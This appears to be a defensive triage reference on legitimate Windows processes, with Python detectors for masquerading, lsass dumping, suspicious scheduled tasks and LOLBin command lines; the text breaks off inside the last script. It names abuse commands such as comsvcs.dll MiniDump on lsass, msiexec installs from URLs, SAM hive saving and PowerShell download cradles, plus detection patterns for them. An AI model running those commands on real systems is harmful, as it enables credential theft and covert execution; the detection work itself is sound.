Legitimate Windows Processes

This page lists legitimate Windows processes with their expected image paths, their purposes, and the ways attackers abuse or impersonate them. For every entry, the things worth checking during triage are the same: the image path, the parent process, the number of instances, the account the process runs as, and the command line. A legitimate name with the wrong path or parent is the most common sign of masquerading (MITRE ATT&CK T1036.005), and a legitimate binary with an unusual command line or parent is the most common sign of proxy execution (T1218).

1. System-Level Processes

System

  • Path: N/A (kernel-mode process; always PID 4, and the only parent it can have is the System Idle Process, PID 0)

  • Purpose: Hosts the kernel's system threads, which manage core operating system functions including hardware interaction through drivers.

  • Attack Use: Cannot be replaced, but kernel-mode malware (rootkits, malicious or vulnerable signed drivers) executes inside it and hides activity from user-mode tools. A "System" process that is not PID 4, or one that has a user-mode image path, is an impostor.

smss.exe (Session Manager Subsystem)

  • Path: C:\Windows\System32\smss.exe

  • Purpose: Creates sessions during startup. The master instance (parent: System, PID 4) launches csrss.exe and wininit.exe for session 0 and csrss.exe and winlogon.exe for each interactive session, using short-lived child instances of itself that exit as soon as the session is set up.

  • Attack Use: Rarely abused directly. Expect exactly one persistent instance, in System32, running as SYSTEM, with System as its parent. Because the per-session child instances exit, csrss.exe, wininit.exe and winlogon.exe normally show no living parent; a smss.exe that is still someone's parent is odd.

csrss.exe (Client/Server Runtime Subsystem)

  • Path: C:\Windows\System32\csrss.exe

  • Purpose: User-mode side of the Win32 subsystem: process and thread bookkeeping, console window handling (together with conhost.exe) and shutdown. One instance per session, running as SYSTEM.

  • Attack Use: A favourite name for masquerading (a csrss.exe in a user-writable directory, with a living parent, or running as a normal user), and a source or target in injection-based attacks. It is a critical process: terminating it triggers a bug check, which is one reason malware prefers to impersonate rather than tamper with it.

wininit.exe (Windows Initialization)

  • Path: C:\Windows\System32\wininit.exe

  • Purpose: Initializes session 0: starts services.exe (the Service Control Manager) and lsass.exe (and, on Windows 7, lsm.exe), and remains their parent for the life of the system.

  • Attack Use: Rarely abused. Expect exactly one instance, in System32, running as SYSTEM, with no living parent (the smss.exe child that started it has exited). A second wininit.exe, or one with a different path or parent, is masquerading for persistence.

2. Service Host Processes

svchost.exe (Service Host)

  • Path: C:\Windows\System32\svchost.exe

  • Purpose: Generic host for services implemented as DLLs (networking, Windows Update, Task Scheduler and many more). One instance per service group, and since Windows 10 1703 often one per service on machines with more than 3.5 GB of RAM, so dozens of instances are normal.

  • Attack Use: The most impersonated name on Windows: droppers named svchost.exe in Temp or AppData, launched without a -k service group, or with a parent other than services.exe. The real binary is also abused through malicious services whose ServiceDll points at an attacker DLL, and as a target for injection because its network traffic blends in. Checks: image in System32 (or SysWOW64), parent services.exe, command line containing -k <group>, and an account of SYSTEM, LOCAL SERVICE, NETWORK SERVICE or, for the per-user UnistackSvcGroup instances, the logged-on user.

services.exe (Service Control Manager)

  • Path: C:\Windows\System32\services.exe

  • Purpose: The Service Control Manager: starts, stops and tracks services, and is the parent of every svchost.exe and of every standalone service executable.

  • Attack Use: Services registered for persistence (T1543.003) and for lateral movement (PsExec and its clones create a service on the target) appear as services.exe children and in System event 7045 and Security event 4697. Expect one instance, in System32, parent wininit.exe, running as SYSTEM.
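The expectations above (path, parent, instance count, account, and the -k group for svchost.exe) are simple to check mechanically. The script below is an added example, not code from the original page: it runs those checks over a process listing whose rows are constructed for the example but carry the same fields you get from Get-CimInstance Win32_Process on a live host or from Volatility's windows.pslist on a memory image. The baseline in RULES is an assumption derived from the descriptions on this page; the lookalike check uses a similarity cutoff chosen so that the real names above do not collide with each other.

```python
"""Process-tree triage against the baseline described on this page.
Added example, not from the original page; the listing below is constructed."""
import difflib
from dataclasses import dataclass


@dataclass
class Proc:
    pid: int
    ppid: int
    name: str
    path: str      # full image path; "" for the kernel-mode System process
    cmdline: str
    user: str


SYSTEM = r"nt authority\system"
S32 = r"c:\windows\system32"

# Assumed baseline. parents: allowed parent image names; None means "parent has
# exited", which is normal for children of the short-lived per-session smss.exe
# instances and for explorer.exe (userinit.exe exits after launching it).
RULES = {
    "system":       dict(path="",                     parents={None},           single=True,  user=SYSTEM),
    "smss.exe":     dict(path=S32 + r"\smss.exe",     parents={"system"},       single=True,  user=SYSTEM),
    "csrss.exe":    dict(path=S32 + r"\csrss.exe",    parents={None},           single=False, user=SYSTEM),
    "wininit.exe":  dict(path=S32 + r"\wininit.exe",  parents={None},           single=True,  user=SYSTEM),
    "winlogon.exe": dict(path=S32 + r"\winlogon.exe", parents={None},           single=False, user=SYSTEM),
    "services.exe": dict(path=S32 + r"\services.exe", parents={"wininit.exe"},  single=True,  user=SYSTEM),
    "lsass.exe":    dict(path=S32 + r"\lsass.exe",    parents={"wininit.exe"},  single=True,  user=SYSTEM),
    "svchost.exe":  dict(path=S32 + r"\svchost.exe",  parents={"services.exe"}, single=False, user=None),
    "explorer.exe": dict(path=r"c:\windows\explorer.exe", parents={None, "userinit.exe"}, single=False, user=None),
}


def triage(procs):
    """Return (pid, name, reason) tuples for every deviation from RULES."""
    by_pid = {p.pid: p for p in procs}
    first_seen = {}        # singleton name -> pid of the first (lowest-pid) instance
    findings = []
    # Lowest PID is treated as the boot-time original. PIDs recycle, so on a
    # live system compare process start times instead of PIDs.
    for p in sorted(procs, key=lambda x: x.pid):
        name = p.name.lower()
        rule = RULES.get(name)
        if rule is None:
            # Unknown name: is it a lookalike of a protected one (svch0st.exe, scvhost.exe)?
            close = difflib.get_close_matches(name, list(RULES), n=1, cutoff=0.8)
            if close:
                findings.append((p.pid, p.name, f"lookalike of {close[0]}"))
            continue
        parent = by_pid.get(p.ppid)
        parent_name = parent.name.lower() if parent else None
        reasons = []
        if p.path.lower() != rule["path"]:
            reasons.append(f"unexpected path {p.path}")
        if parent_name not in rule["parents"]:
            reasons.append(f"unexpected parent {parent_name or 'pid %d (not running)' % p.ppid}")
        if rule["user"] and p.user.lower() != rule["user"]:
            reasons.append(f"unexpected user {p.user}")
        if name == "svchost.exe" and "-k" not in p.cmdline.lower().split():
            reasons.append("svchost.exe started without a -k service group")
        if rule["single"]:
            if name in first_seen:
                reasons.append(f"extra instance (first seen as pid {first_seen[name]})")
            else:
                first_seen[name] = p.pid
        findings.extend((p.pid, p.name, r) for r in reasons)
    return findings


# Constructed listing: a healthy boot chain followed by three planted anomalies.
SAMPLE = [
    Proc(4,    0,    "System",       "",                                  "",                                               "NT AUTHORITY\\SYSTEM"),
    Proc(368,  4,    "smss.exe",     r"C:\Windows\System32\smss.exe",     r"\SystemRoot\System32\smss.exe",                 "NT AUTHORITY\\SYSTEM"),
    Proc(500,  480,  "csrss.exe",    r"C:\Windows\System32\csrss.exe",    "%SystemRoot%\\system32\\csrss.exe",              "NT AUTHORITY\\SYSTEM"),
    Proc(560,  480,  "wininit.exe",  r"C:\Windows\System32\wininit.exe",  "wininit.exe",                                    "NT AUTHORITY\\SYSTEM"),
    Proc(620,  560,  "services.exe", r"C:\Windows\System32\services.exe", r"C:\Windows\system32\services.exe",              "NT AUTHORITY\\SYSTEM"),
    Proc(640,  560,  "lsass.exe",    r"C:\Windows\System32\lsass.exe",    r"C:\Windows\system32\lsass.exe",                 "NT AUTHORITY\\SYSTEM"),
    Proc(800,  620,  "svchost.exe",  r"C:\Windows\System32\svchost.exe",  r"C:\Windows\system32\svchost.exe -k netsvcs -p", "NT AUTHORITY\\SYSTEM"),
    Proc(3000, 2950, "explorer.exe", r"C:\Windows\explorer.exe",          r"C:\Windows\Explorer.EXE",                       "WS01\\bob"),  # 2950 = userinit.exe, exited
    Proc(2100, 3000, "svchost.exe",  r"C:\Users\bob\AppData\Local\Temp\svchost.exe", r"C:\Users\bob\AppData\Local\Temp\svchost.exe", "WS01\\bob"),
    Proc(2200, 560,  "lsass.exe",    r"C:\Windows\System32\lsass.exe",    r"C:\Windows\system32\lsass.exe",                 "NT AUTHORITY\\SYSTEM"),
    Proc(2300, 3000, "svch0st.exe",  r"C:\Users\bob\AppData\Roaming\svch0st.exe", "svch0st.exe -k netsvcs",                 "WS01\\bob"),
]

if __name__ == "__main__":
    for pid, name, reason in triage(SAMPLE):
        print(f"{pid:>5}  {name:<14} {reason}")
```

The planted svchost.exe fails three checks at once (path, parent, missing -k), the second lsass.exe is caught only by the instance count, and svch0st.exe is caught only by the lookalike check; each check catches a different masquerading style, which is why all of them are worth running rather than just the path comparison.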

3. User-Level Processes

explorer.exe (Windows Explorer)

  • Path: C:\Windows\explorer.exe

  • Purpose: The Windows shell: desktop, taskbar and File Explorer. One instance per interactive user (more if "Launch folder windows in a separate process" is enabled).

  • Attack Use: Persistence through COM hijacking (a CLSID registered under HKCU\Software\Classes\CLSID that the shell loads), shell extensions and the Winlogon Shell value, and a common injection target because its outbound network traffic looks unremarkable. Expect it at C:\Windows\explorer.exe, started by userinit.exe (which exits, so no living parent), running as the logged-on user and never as SYSTEM.

taskhostw.exe (Task Host)

  • Path: C:\Windows\System32\taskhostw.exe

  • Purpose: Host process for scheduled tasks and other work implemented as DLLs rather than executables (taskhost.exe on Windows 7, taskhostex.exe on Windows 8). Its parent is the svchost.exe hosting the Schedule service.

  • Attack Use: A malicious DLL-based task runs inside it, so the process looks legitimate while the code is not; check the task definitions under C:\Windows\System32\Tasks and treat a taskhostw.exe with a non-svchost parent or a non-System32 path as masquerading.

dllhost.exe (COM Surrogate)

  • Path: C:\Windows\System32\dllhost.exe

  • Purpose: COM Surrogate: hosts out-of-process COM servers so that a crashing or untrusted component does not take down the caller. Legitimate instances carry /Processid:{CLSID} on the command line and have svchost.exe (DcomLaunch) as parent.

  • Attack Use: COM hijacking (the hijacked CLSID's DLL is loaded into dllhost.exe), a masquerading name, and an injection target. A dllhost.exe without /Processid, one started from an unexpected parent, or one making network connections deserves a look.

cmd.exe (Command Prompt)

  • Path: C:\Windows\System32\cmd.exe

  • Purpose: Command-line interpreter for commands and batch scripts (a 32-bit copy lives under C:\Windows\SysWOW64).

  • Attack Use: Execution proxy for nearly every intrusion stage. The binary itself is never the indicator; its context is: an Office application, a web server worker (w3wp.exe), a database engine or a service spawning cmd.exe, or a command line (/c) with chained, ^-escaped or otherwise obfuscated commands.

powershell.exe (PowerShell)

  • Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (32-bit copy under C:\Windows\SysWOW64\WindowsPowerShell\v1.0\; PowerShell 7 is pwsh.exe under C:\Program Files\PowerShell\7\)

  • Purpose: Scripting and automation shell with full access to .NET and the Windows APIs.

  • Attack Use: The primary post-exploitation tool: in-memory download cradles (DownloadString, Invoke-Expression), -EncodedCommand, -WindowStyle Hidden and -NoProfile, and whole frameworks such as Empire and PowerSploit. Enable Script Block Logging (event 4104 in Microsoft-Windows-PowerShell/Operational) and Module Logging; note that attackers can also host System.Management.Automation in their own executable and never start powershell.exe at all.

4. Network and Communication Processes

lsass.exe (Local Security Authority Subsystem Service)

  • Path: C:\Windows\System32\lsass.exe

  • Purpose: The Local Security Authority: authenticates logons through its authentication packages (MSV1_0, Kerberos, Negotiate), enforces local security policy, issues access tokens, and on domain controllers hosts Active Directory itself. Expect one instance, in System32, parent wininit.exe, running as SYSTEM.

  • Attack Use: Credential dumping (T1003.001): Mimikatz, procdump, Task Manager's "Create dump file", rundll32.exe comsvcs.dll,MiniDump and countless custom loaders all open lsass.exe and read its memory. Detect with Sysmon event 10 (ProcessAccess) where the target is lsass.exe and the access mask includes memory-read rights (0x1010, 0x1410 and 0x1fffff are the usual values), and harden with LSA protection (RunAsPPL) and Credential Guard.
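The Sysmon detection just described comes down to three questions per event 10 record: is the target lsass.exe, does the granted access mask include memory rights, and is the source a process that is allowed to hold such a handle. The following is an added example, not code from the original page: it answers those questions over constructed event records whose field names follow Sysmon's (SourceImage, TargetImage, GrantedAccess, CallTrace). The allowlist of benign sources is an assumption to be replaced by a baseline from your own fleet (the Defender engine path in particular varies by version), and the severity rule treats a full-access handle or a dump-capable module in the call trace as the strong signal.

```python
"""Flag suspicious handles to lsass.exe in Sysmon event 10 (ProcessAccess) records.
Added example, not from the original page; the events below are constructed."""

# Access-mask bits that matter for credential dumping (values from winnt.h).
PROCESS_CREATE_THREAD = 0x0002
PROCESS_VM_OPERATION = 0x0008
PROCESS_VM_READ = 0x0010
PROCESS_VM_WRITE = 0x0020
PROCESS_DUP_HANDLE = 0x0040
MEMORY_BITS = (PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_READ
               | PROCESS_VM_WRITE | PROCESS_DUP_HANDLE)

# Assumed allowlist of processes that legitimately open lsass with memory access.
# Keep it path-exact: a "svchost.exe" in Temp must not inherit the exemption.
ALLOWED_SOURCES = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\windows\system32\svchost.exe",
    r"c:\windows\system32\lsass.exe",
    r"c:\program files\windows defender\msmpeng.exe",
}
# Call-trace markers: MiniDumpWriteDump lives in dbghelp/dbgcore, comsvcs.dll
# wraps it, and UNKNOWN(...) frames are code that is not backed by a file on disk.
DUMP_MARKERS = ("dbghelp.dll", "dbgcore.dll", "comsvcs.dll", "unknown")


def triage_lsass_access(events):
    """Return one finding per suspicious handle to lsass.exe."""
    findings = []
    for ev in events:
        if ev.get("EventID") != 10 or not ev["TargetImage"].lower().endswith("\\lsass.exe"):
            continue
        access = int(ev["GrantedAccess"], 16)
        if not access & MEMORY_BITS:
            continue                      # 0x1000 / 0x1400 query-only handles are routine
        if ev["SourceImage"].lower() in ALLOWED_SOURCES:
            continue
        trace = ev.get("CallTrace", "").lower()
        dumper = any(marker in trace for marker in DUMP_MARKERS)
        findings.append({
            "source": ev["SourceImage"],
            "access": f"0x{access:x}",
            "severity": "high" if dumper or access == 0x1FFFFF else "medium",
        })
    return findings


LSASS = r"C:\Windows\System32\lsass.exe"
NTDLL = r"C:\Windows\SYSTEM32\ntdll.dll+9d0e4|C:\Windows\System32\KERNELBASE.dll+2b3f2"

# Constructed records: two routine handles, an allowlisted AV scan, three dumpers,
# one unknown tool with read access, and one event that does not target lsass.
SAMPLE_EVENTS = [
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\csrss.exe", "TargetImage": LSASS,
     "GrantedAccess": "0x1400", "CallTrace": NTDLL + r"|C:\Windows\System32\csrss.exe+1a2b"},
    {"EventID": 10, "SourceImage": r"C:\Program Files\Windows Defender\MsMpEng.exe", "TargetImage": LSASS,
     "GrantedAccess": "0x1410", "CallTrace": NTDLL + r"|C:\Program Files\Windows Defender\mpengine.dll+4c1d0"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\taskmgr.exe", "TargetImage": LSASS,
     "GrantedAccess": "0x1fffff", "CallTrace": NTDLL + r"|C:\Windows\System32\dbgcore.dll+1f4a|C:\Windows\System32\taskmgr.exe+3e21"},
    {"EventID": 10, "SourceImage": r"C:\Users\bob\Downloads\procdump64.exe", "TargetImage": LSASS,
     "GrantedAccess": "0x1fffff", "CallTrace": NTDLL + r"|C:\Windows\System32\dbgcore.dll+1f4a|C:\Users\bob\Downloads\procdump64.exe+7c10"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\rundll32.exe", "TargetImage": LSASS,
     "GrantedAccess": "0x1410", "CallTrace": NTDLL + r"|C:\Windows\System32\comsvcs.dll+2bb1a|C:\Windows\System32\rundll32.exe+1a5b"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\svchost.exe", "TargetImage": LSASS,
     "GrantedAccess": "0x1010", "CallTrace": NTDLL + r"|C:\Windows\System32\wbem\wmiprvse.exe+2f00"},
    {"EventID": 10, "SourceImage": r"C:\Users\bob\AppData\Local\Temp\update.exe", "TargetImage": LSASS,
     "GrantedAccess": "0x1010", "CallTrace": NTDLL + r"|C:\Users\bob\AppData\Local\Temp\update.exe+1337"},
    {"EventID": 10, "SourceImage": r"C:\Users\bob\Downloads\procdump64.exe", "TargetImage": r"C:\Windows\System32\svchost.exe",
     "GrantedAccess": "0x1fffff", "CallTrace": NTDLL},
]

if __name__ == "__main__":
    for f in triage_lsass_access(SAMPLE_EVENTS):
        print(f"{f['severity']:<6} {f['access']:<9} {f['source']}")
```

The csrss.exe handle passes because 0x1400 carries no memory rights, the Defender engine passes only because its exact path is allowlisted, and the three dumpers are rated high for different reasons: the Task Manager and procdump handles request full access and show dbgcore.dll in the call trace, while the rundll32.exe handle requests a modest 0x1410 but shows comsvcs.dll, which is the MiniDump export being abused. Sysmon must be configured to log ProcessAccess for lsass.exe at all; by default the ProcessAccess rule group is empty.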

winlogon.exe (Windows Logon Application)

  • Path: C:\Windows\System32\winlogon.exe

  • Purpose: Interactive logon for each session: handles the secure attention sequence (Ctrl+Alt+Del), loads the user profile, starts userinit.exe (which launches the shell) and manages lock, unlock and logoff. Expect one instance per interactive session, in System32, running as SYSTEM, with no living parent.

  • Attack Use: Persistence through the registry values it reads under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon (T1547.004): Userinit (default "C:\Windows\system32\userinit.exe,") and Shell (default "explorer.exe"). Anything appended to those comma-separated values runs at every logon with the user's privileges. Also a masquerading name: a winlogon.exe with a living parent or outside System32 is not the real one.

mstsc.exe (Remote Desktop Client)

  • Path: C:\Windows\System32\mstsc.exe

  • Purpose: Remote Desktop (RDP) client.

  • Attack Use: Lateral movement and interactive access with stolen credentials. On the source host, look at the Terminal Server Client\Servers key in the user's NTUSER.DAT and Default.rdp in the user's Documents folder; on the destination, at Security event 4624 with logon type 10 and TerminalServices-RemoteConnectionManager event 1149. Attackers frequently bring their own RDP client, so mstsc.exe itself is often absent from the source.

rundll32.exe (Run DLL as an App)

  • Path: C:\Windows\System32\rundll32.exe

  • Purpose: Loads a DLL and calls one of its exports (rundll32.exe <dll>,<export> [arguments]); used constantly by Windows itself with shell32.dll, printui.dll and similar libraries. A 32-bit copy exists under SysWOW64.

  • Attack Use: Proxy execution (T1218.011): loading an attacker DLL from a user-writable path, calling exports by ordinal (,#1), running inline script through the mshtml RunHTMLApplication trick, or dumping lsass with comsvcs.dll,MiniDump. Judge it by the command line and the parent, never by the image.

wscript.exe and cscript.exe (Windows Script Host)

  • Path: C:\Windows\System32\wscript.exe / C:\Windows\System32\cscript.exe

  • Purpose: Windows Script Host: runs VBScript and JScript (.vbs, .js, .wsf, .wse); wscript.exe presents GUI dialogs, cscript.exe writes to the console. 32-bit copies exist under SysWOW64.

  • Attack Use: First-stage loaders delivered in archives or as e-mail attachments (T1059.005, T1059.007). Look for scripts run from Downloads, Temp or AppData, for explorer.exe launching wscript.exe on a double-clicked attachment, and for an Office application as the parent.

5. Scheduled Task and Utility Processes

schtasks.exe (Task Scheduler)

  • Path: C:\Windows\System32\schtasks.exe

  • Purpose: Command-line front end to the Task Scheduler service (which itself runs inside an svchost.exe); creates, queries and deletes tasks locally or on a remote host (/S).

  • Attack Use: Persistence, delayed execution and remote execution (T1053.005). Evidence: task XML under C:\Windows\System32\Tasks, the TaskCache tree under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache, Security event 4698 (task created) and event 106 in Microsoft-Windows-TaskScheduler/Operational. Tasks created through the COM API (PowerShell's Register-ScheduledTask, or malware calling it directly) leave the same artifacts without ever running schtasks.exe.
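The task XML under C:\Windows\System32\Tasks (the same format Export-ScheduledTask emits) carries everything needed to judge a task: who it runs as, whether it is hidden, what it executes and how often. The script below is an added example, not code from the original page; it parses two constructed task definitions, one modelled on a benign Windows Update task and one modelled on a typical persistence task, and lists the traits described above. The heuristics and thresholds (user-writable paths, a repetition interval of ten minutes or less) are assumptions to tune; task files on disk are UTF-16, so read them with that encoding before handing the text to inspect_task.

```python
"""Inspect scheduled task XML for persistence traits.
Added example, not from the original page; both task definitions are constructed."""
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
PROXIES = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
           "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe"}
USER_WRITABLE = re.compile(r"\\users\\|\\temp\\|\\programdata\\|\\public\\|%temp%|%appdata%", re.I)
SUSPICIOUS_ARGS = re.compile(r"-e[a-z]{0,14}\s+[A-Za-z0-9+/=]{16,}|-w(?:indowstyle)?\s+hidden|https?://", re.I)
SYSTEM_IDS = ("s-1-5-18", "system", r"nt authority\system")


def interval_minutes(iso):
    """Minutes in an ISO 8601 duration such as PT5M, PT1H30M or P1D; None if unparsable."""
    m = re.fullmatch(r"P(?:(\d+)D)?(?:T(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?)?", iso or "")
    if not m:
        return None
    d, h, mi, s = (int(x) if x else 0 for x in m.groups())
    return d * 1440 + h * 60 + mi + s / 60


def inspect_task(xml_text):
    """Return the reasons this task deserves a closer look (empty list = nothing odd)."""
    root = ET.fromstring(xml_text)
    reasons = []
    if root.findtext("t:Settings/t:Hidden", default="false", namespaces=NS).lower() == "true":
        reasons.append("hidden task")
    principal = root.find("t:Principals/t:Principal", NS)
    user = principal.findtext("t:UserId", default="", namespaces=NS) if principal is not None else ""
    run_level = principal.findtext("t:RunLevel", default="", namespaces=NS) if principal is not None else ""
    for ex in root.findall("t:Actions/t:Exec", NS):
        cmd = ex.findtext("t:Command", default="", namespaces=NS)
        args = ex.findtext("t:Arguments", default="", namespaces=NS)
        exe = cmd.strip('"').rsplit("\\", 1)[-1].lower()
        if exe in PROXIES:
            reasons.append(f"action uses execution proxy {exe}")
        if USER_WRITABLE.search(cmd) or USER_WRITABLE.search(args):
            reasons.append("action references a user-writable path")
        if SUSPICIOUS_ARGS.search(args):
            reasons.append("arguments look like an encoded, hidden or download command")
        # A bare command name resolves through PATH, so it also counts as "outside Windows".
        if user.lower() in SYSTEM_IDS and not cmd.lower().startswith(("c:\\windows\\", "%windir%", "%systemroot%")):
            reasons.append("runs as SYSTEM from outside the Windows directory")
    for iv in root.findall(".//t:Repetition/t:Interval", NS):
        mins = interval_minutes(iv.text)
        if mins is not None and mins <= 10:
            reasons.append(f"repeats every {iv.text} (beacon-like)")
    if run_level == "HighestAvailable" and reasons:
        reasons.append("requests highest available privileges")
    return reasons


# Constructed, modelled on the built-in UpdateOrchestrator scan task.
BENIGN_TASK = r"""<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><Author>Microsoft Corporation</Author><URI>\Microsoft\Windows\UpdateOrchestrator\Schedule Scan</URI></RegistrationInfo>
  <Triggers><CalendarTrigger><StartBoundary>2024-01-01T03:00:00</StartBoundary><ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay></CalendarTrigger></Triggers>
  <Principals><Principal id="Author"><UserId>S-1-5-18</UserId><RunLevel>LeastPrivilege</RunLevel></Principal></Principals>
  <Settings><Hidden>false</Hidden></Settings>
  <Actions Context="Author"><Exec><Command>%windir%\system32\usoclient.exe</Command><Arguments>StartScan</Arguments></Exec></Actions>
</Task>"""

# Constructed, modelled on a typical persistence task: hidden, SYSTEM, highest
# privileges, runs at logon and every five minutes, PowerShell script from a public path.
SUSPICIOUS_TASK = r"""<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><Author>WS01\bob</Author><URI>\OneDriveSync</URI></RegistrationInfo>
  <Triggers>
    <LogonTrigger><Enabled>true</Enabled></LogonTrigger>
    <CalendarTrigger><StartBoundary>2024-05-01T00:00:00</StartBoundary><ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay>
      <Repetition><Interval>PT5M</Interval><Duration>P1D</Duration></Repetition></CalendarTrigger>
  </Triggers>
  <Principals><Principal id="Author"><UserId>S-1-5-18</UserId><RunLevel>HighestAvailable</RunLevel></Principal></Principals>
  <Settings><Hidden>true</Hidden></Settings>
  <Actions Context="Author"><Exec><Command>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Command>
    <Arguments>-NoP -w hidden -File C:\Users\Public\Libraries\sync.ps1</Arguments></Exec></Actions>
</Task>"""

if __name__ == "__main__":
    for label, xml_text in (("benign", BENIGN_TASK), ("suspicious", SUSPICIOUS_TASK)):
        print(label, inspect_task(xml_text) or ["nothing odd"])
```

The benign task runs as SYSTEM too, which is why the account alone is not a signal; it is the combination of hidden, an execution proxy, a script in a public directory and a five-minute repetition that makes the second task worth pulling the script for.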

taskmgr.exe (Task Manager)

  • Path: C:\Windows\System32\taskmgr.exe

  • Purpose: Interactive process, service and performance monitor.

  • Attack Use: Not a malware host, but its "Create dump file" context-menu entry writes a full memory dump of lsass.exe to %TEMP% with no extra tooling, so taskmgr.exe opening lsass.exe with read access deserves the same attention as procdump would.

6. Browser and Media Processes

msedge.exe (Microsoft Edge)

  • Path: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

  • Purpose: Internet browsing.

  • Attack Use: Exploited through renderer and sandbox-escape vulnerabilities and malicious extensions rather than abused as a LOLBin. A browser as the parent of cmd.exe, powershell.exe or a freshly downloaded executable is the classic drive-by or social-engineering chain. Many msedge.exe child processes (renderer, GPU, utility, crashpad) are normal.

wmplayer.exe (Windows Media Player)

  • Path: C:\Program Files (x86)\Windows Media Player\wmplayer.exe (a 64-bit copy exists under C:\Program Files\Windows Media Player\)

  • Purpose: Plays media files.

  • Attack Use: Crafted media files that exploit codec or parser bugs; rarely seen in modern intrusions, but a media player spawning a shell or script host is never normal.

7. System Update Processes

wuauclt.exe (Windows Update Client)

  • Path: C:\Windows\System32\wuauclt.exe

  • Purpose: Windows Update client front end. On Windows 10 and later most update work runs in the wuauserv service inside svchost.exe and in usoclient.exe, so wuauclt.exe is rarely seen running for long.

  • Attack Use: A documented LOLBin: wuauclt.exe /UpdateDeploymentProvider <path to DLL> /RunHandlerComServer loads an arbitrary DLL under a trusted Microsoft-signed name (T1218). Attackers also name droppers after update components; verify the path and, when the binary is real, the DLL argument.

8. Administrative and Diagnostic Tools

regedit.exe (Registry Editor)

  • Path: C:\Windows\System32\regedit.exe

  • Purpose: GUI editor for the registry; regedit /s file.reg imports a .reg file silently, and reg.exe is the scriptable equivalent (reg add, reg query, reg save).

  • Attack Use: Run-key and service persistence, disabling security settings, and saving hives (reg save HKLM\SAM, SECURITY and SYSTEM) for offline credential extraction; watch for reg.exe save commands and for .reg imports from user-writable paths.

msiexec.exe (Windows Installer)

  • Path: C:\Windows\System32\msiexec.exe

  • Purpose: Installs MSI packages.

  • Attack Use: Proxy execution (T1218.007): installing a package straight from a URL (msiexec /q /i http://...), or loading a DLL via /y (DllRegisterServer) or /z (DllUnregisterServer). A 32-bit copy exists under SysWOW64. Silent installs from Temp or a URL, and an MSI whose CustomAction spawns PowerShell or cmd.exe, deserve attention.

perfmon.exe (Performance Monitor)

  • Path: C:\Windows\System32\perfmon.exe

  • Purpose: Monitors system performance.

  • Attack Use: Rarely abused; occasionally used for reconnaissance of running services and counters, but not a meaningful execution proxy.

Processes Often Targeted by Attackers

  1. High-privilege processes (impersonated, injected into, or read from):

    • svchost.exe

    • lsass.exe

    • winlogon.exe

  2. Versatile execution proxies (LOLBins; mshta.exe, reg.exe and certutil.exe are not described above but belong in the same class):

    • powershell.exe

    • cmd.exe

    • rundll32.exe

    • mshta.exe

    • reg.exe

    • certutil.exe

  3. Service and COM host processes (persistence and injection targets):

    • dllhost.exe

    • explorer.exe

  4. Automation and scripting processes:

    • wscript.exe

    • cscript.exe
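For the execution-proxy class in this list, the binary is legitimate by definition, so detection lives in the command line and the parent. The script below is an added example, not code from the original page, that scores constructed process-creation records (fields named as in Sysmon event 1 and Security event 4688: Image, CommandLine, ParentImage) against the abuse patterns described on this page: rundll32.exe loading from user-writable paths or by ordinal, certutil.exe downloading or decoding, msiexec.exe installing from a URL, the wuauclt.exe DLL-load trick, script hosts run from user paths, PowerShell download cradles and hidden windows, and an Office application spawning any of them. It also decodes -EncodedCommand payloads (base64 of UTF-16LE) so the same patterns are applied to the decoded script. The rule set and tag names are assumptions, deliberately kept narrow to stay readable; the sample IP addresses are from the documentation range.

```python
"""Score process-creation records for LOLBin abuse patterns.
Added example, not from the original page; the records below are constructed."""
import base64
import binascii
import re

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
PROXIES = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe",
           "rundll32.exe", "regsvr32.exe", "certutil.exe", "msiexec.exe", "wuauclt.exe"}
USER_WRITABLE = r"\\users\\|\\temp\\|\\programdata\\|\\public\\"

# (image-name regex, command-line regex, tag). Assumed heuristics, not a full ruleset.
RULES = [
    (r"rundll32\.exe", USER_WRITABLE + r"|javascript:|vbscript:|\.dll,#\d+|comsvcs\.dll.*minidump|https?://", "rundll32-suspicious"),
    (r"regsvr32\.exe", r"/i:https?://|scrobj\.dll|" + USER_WRITABLE, "regsvr32-scriptlet"),
    (r"mshta\.exe", r"https?://|javascript:|vbscript:|" + USER_WRITABLE, "mshta-remote-or-inline"),
    (r"certutil\.exe", r"-urlcache|-decode|-encode|-split", "certutil-download-or-decode"),
    (r"msiexec\.exe", r"https?://|\s/y\s|\s/z\s", "msiexec-remote-or-dll"),
    (r"wuauclt\.exe", r"/updatedeploymentprovider\s.*?/runhandlercomserver", "wuauclt-dll-load"),
    (r"[wc]script\.exe", USER_WRITABLE + r"|/e:", "wsh-script-from-user-path"),
    (r"powershell\.exe|pwsh\.exe",
     r"downloadstring|downloadfile|invoke-expression|\biex\b|frombase64string|net\.webclient|invoke-webrequest|\biwr\b",
     "powershell-download-or-iex"),
    (r"powershell\.exe|pwsh\.exe", r"-w(?:indowstyle)?\s+hidden", "powershell-hidden"),
]
# -e, -ec, -enc ... -EncodedCommand followed by a base64 run (the prefix is accepted by PowerShell).
ENCODED = re.compile(r"-e[a-z]{0,14}\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(cmdline):
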